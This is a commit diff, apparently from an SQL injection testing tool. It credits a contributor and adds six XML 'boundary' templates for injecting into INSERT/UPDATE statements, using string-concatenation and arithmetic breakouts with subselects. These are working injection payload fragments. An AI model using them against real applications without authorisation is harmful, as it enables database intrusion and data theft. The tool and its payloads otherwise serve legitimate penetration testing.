adding INSERT/UPDATE generic boundaries

2024-11-22 01:26:42 +03:00 · 2011-10-28 11:00:09 +00:00 · 2011-10-28 11:00:09 +00:00 · 2e5222bfd8
commit 2e5222bfd8
parent 7ce3af68fc
2 changed files with 60 additions and 1 deletions
--- a/doc/THANKS
+++ b/doc/THANKS
@ -368,6 +368,9 @@ Christopher Patten <cpatten@sunera.com>
 Zack Payton <zack.payton@executiveinstruments.com>
    for reporting a minor bug

+Jaime Penalba <nighterman@painsec.com>
+    for contributing a patch for INSERT/UPDATE generic boundaries
+
 Travis Phillips <perfect_insanity2004@yahoo.com>
    for suggesting a minor enhancement

--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@ -485,7 +485,63 @@ Formats:
        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix></suffix>
    </boundary>
-    <!-- End of generic boundaries -->
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+    <!-- End of INSERT/UPDATE generic boundaries -->


    <!-- Boolean-based blind tests - WHERE/HAVING clause -->